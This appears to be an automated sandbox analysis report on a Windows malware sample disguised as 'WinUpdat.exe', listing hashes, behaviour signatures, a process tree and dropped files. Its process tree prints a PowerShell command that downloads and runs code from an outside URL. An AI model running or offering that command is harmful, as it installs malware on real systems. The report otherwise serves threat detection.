Analysis

  • max time kernel
    91s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    17-05-2022 13:05

General

  • Target

    2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe

  • Size

    6.1MB

  • MD5

    5f9e61796a21e65f9a03f92ee6a8f6d8

  • SHA1

    d6032fd04db0fbb6195b6e8d31491a3fc289f1ce

  • SHA256

    2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba

  • SHA512

    402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://supportnimbuzz.hexat.com/3/Att.jpg

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Detects Pyinstaller 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
    "C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
        C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN
          4⤵
            PID:2008
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"
        2⤵
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1016

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs
      Filesize

      545B

      MD5

      bf83a0622f50dfe26baed65b8fb73a93

      SHA1

      4dce1e24f1a465b427d3a8afce0c9719ef7b7a73

      SHA256

      ded94f48e84bf9d99d42fe67fd75ea6971a66b225a429e2c12295e7513ecf894

      SHA512

      2141e65f84486bc512e36dd5ad54371f286cdb7eb5e91f0e69c7910de4fbd932755e3f422feee54a3d2d3c074433ff9cb1bc4eef6842b5d9b9451bc21c75ff0e

    • C:\Users\Admin\AppData\Local\Temp\_MEI14402\MSVCR90.dll
      Filesize

      627KB

      MD5

      ab2156d75b2c9589f925fc2ab83607e6

      SHA1

      83990c32b1006e0558de27e55b3862f5ea554394

      SHA256

      bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc

      SHA512

      2ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086

    • C:\Users\Admin\AppData\Local\Temp\_MEI14402\python27.dll
      Filesize

      3.3MB

      MD5

      3e35352c82fbccda9c372b8443f73e5e

      SHA1

      a30a055e2e7b12c0a6d56afc1869b3b5283ac889

      SHA256

      dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

      SHA512

      ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_ctypes.pyd
      Filesize

      119KB

      MD5

      f5ec0b24dfc7952241c7a86abfb61455

      SHA1

      84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

      SHA256

      6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

      SHA512

      91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_hashlib.pyd
      Filesize

      1.6MB

      MD5

      c94e5379dc430bc98b676260a929c1c6

      SHA1

      11305c38d58b104a2bd834925bf44930a41a416c

      SHA256

      11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

      SHA512

      d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_multiprocessing.pyd
      Filesize

      34KB

      MD5

      243a85355713e19c26c5f3f27e9876fd

      SHA1

      059006569bd693285ec0373724d49b23d592b2eb

      SHA256

      32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

      SHA512

      ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_socket.pyd
      Filesize

      50KB

      MD5

      542726bb334376b4ee0b20cb19853cbb

      SHA1

      66f88bffce320371e208b5993313b1d84e234dbf

      SHA256

      ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

      SHA512

      3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_ssl.pyd
      Filesize

      2.0MB

      MD5

      1b4639e2970bc4a12e0715f161c26e15

      SHA1

      69c9f8152410380ae4e2465d1711c6d577f7da96

      SHA256

      260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

      SHA512

      2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\select.pyd
      Filesize

      11KB

      MD5

      5659b1b9b316b0dd48556293fd2062f2

      SHA1

      0cb51157ad3655060bc3425174e6feabd8fee07a

      SHA256

      8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

      SHA512

      f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\unicodedata.pyd
      Filesize

      676KB

      MD5

      252a1e38d86c07ac3a476db9117e3453

      SHA1

      b708dc6b672f85f57e7da7a99ef5682616cca2bf

      SHA256

      8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

      SHA512

      aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

    • \Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • \Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • \Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • \Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • \Users\Admin\AppData\Local\Temp\_MEI14402\msvcr90.dll
      Filesize

      627KB

      MD5

      ab2156d75b2c9589f925fc2ab83607e6

      SHA1

      83990c32b1006e0558de27e55b3862f5ea554394

      SHA256

      bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc

      SHA512

      2ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086

    • \Users\Admin\AppData\Local\Temp\_MEI14402\python27.dll
      Filesize

      3.3MB

      MD5

      3e35352c82fbccda9c372b8443f73e5e

      SHA1

      a30a055e2e7b12c0a6d56afc1869b3b5283ac889

      SHA256

      dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

      SHA512

      ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_ctypes.pyd
      Filesize

      119KB

      MD5

      f5ec0b24dfc7952241c7a86abfb61455

      SHA1

      84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

      SHA256

      6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

      SHA512

      91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_hashlib.pyd
      Filesize

      1.6MB

      MD5

      c94e5379dc430bc98b676260a929c1c6

      SHA1

      11305c38d58b104a2bd834925bf44930a41a416c

      SHA256

      11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

      SHA512

      d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_multiprocessing.pyd
      Filesize

      34KB

      MD5

      243a85355713e19c26c5f3f27e9876fd

      SHA1

      059006569bd693285ec0373724d49b23d592b2eb

      SHA256

      32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

      SHA512

      ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_socket.pyd
      Filesize

      50KB

      MD5

      542726bb334376b4ee0b20cb19853cbb

      SHA1

      66f88bffce320371e208b5993313b1d84e234dbf

      SHA256

      ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

      SHA512

      3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_ssl.pyd
      Filesize

      2.0MB

      MD5

      1b4639e2970bc4a12e0715f161c26e15

      SHA1

      69c9f8152410380ae4e2465d1711c6d577f7da96

      SHA256

      260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

      SHA512

      2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\select.pyd
      Filesize

      11KB

      MD5

      5659b1b9b316b0dd48556293fd2062f2

      SHA1

      0cb51157ad3655060bc3425174e6feabd8fee07a

      SHA256

      8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

      SHA512

      f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\unicodedata.pyd
      Filesize

      676KB

      MD5

      252a1e38d86c07ac3a476db9117e3453

      SHA1

      b708dc6b672f85f57e7da7a99ef5682616cca2bf

      SHA256

      8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

      SHA512

      aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

    • memory/980-62-0x0000000000000000-mapping.dmp
    • memory/1016-82-0x0000000000000000-mapping.dmp
    • memory/1016-84-0x0000000073640000-0x00000000736A1000-memory.dmp
      Filesize

      388KB

    • memory/1440-57-0x0000000000000000-mapping.dmp
    • memory/1560-54-0x00000000752B1000-0x00000000752B3000-memory.dmp
      Filesize

      8KB

    • memory/1884-79-0x0000000000000000-mapping.dmp
    • memory/2008-78-0x0000000000000000-mapping.dmp